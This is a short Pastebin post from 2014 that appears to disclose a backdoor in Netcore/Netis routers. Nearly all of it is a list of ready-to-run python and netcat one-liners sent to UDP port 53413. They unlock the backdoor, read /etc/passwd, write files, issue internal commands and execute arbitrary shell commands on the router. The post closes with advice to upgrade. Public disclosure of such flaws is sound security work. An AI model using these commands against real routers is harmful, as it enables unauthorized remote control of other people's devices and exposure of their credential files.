Advertisement
elvanderb

netcore / netis backdoor

Sep 2nd, 2014
2,098
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.76 KB | None | 0 0
  1. netcore / netis backdoor...
  2.  
  3. python -c "print 'A'*8 + 'netcore\x00'" | nc -u -vv IP 53413 # unlock the router (for everybody \o/)
  4. python -c "print 'AA\x00\x01AAAA/etc/passwd\x00'" | nc -u -vv IP 53413 # read file, not supported by all routers
  5. python -c "print 'AA\x00\x02AAAA/etc/passwd\x00'" | nc -u -vv IP 53413 # write file (content in subsequent packets, not reversed...), not supported by all routers
  6. python -c "print 'AA\x00\x00AAAA$Help\x00'" | nc -u -vv IP 53413 # internal commands (don't forget to escape the $ in bash ;) )
  7. python -c "print 'AA\x00\x00AAAA echo toto\x00'" | nc -u -vv IP 53413 # execute shell commands, not supported by all routers
  8. python -c "print 'AA\x00\x00AAAA?\x00'" | nc -u -vv IP 53413 # get version of the deamon
  9.  
  10. Upgrade your router :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement